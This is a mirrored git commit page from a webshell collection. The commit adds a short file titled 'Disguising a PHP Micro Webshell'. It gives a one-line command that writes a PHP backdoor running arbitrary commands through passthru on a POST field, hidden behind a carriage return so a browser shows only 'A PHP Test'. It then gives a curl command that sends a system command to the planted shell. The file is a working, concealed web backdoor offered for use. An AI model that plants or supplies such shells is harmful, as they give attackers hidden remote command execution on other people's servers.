mirror of
https://github.com/tennc/webshell.git
synced 2025-12-06 21:01:29 +00:00
Create 2015-09-12.php
This commit is contained in:
12
php/tw/2015-09-12.php
Normal file
12
php/tw/2015-09-12.php
Normal file
@@ -0,0 +1,12 @@
|
||||
Disguising a PHP Micro Webshell
|
||||
|
||||
` echo -e "<?php passthru(\$_POST[1])?>;\r<?php echo 'A PHP Test ';" > test.php`
|
||||
|
||||
url : http://t.co/YFm6QlpK0k
|
||||
|
||||
vist browser page show `A PHP Test`
|
||||
|
||||
then in console
|
||||
`curl -d 1=id http://www.xxx.xx/xx.php`
|
||||
|
||||
it like in console show command `id`
|
||||
Reference in New Issue
Block a user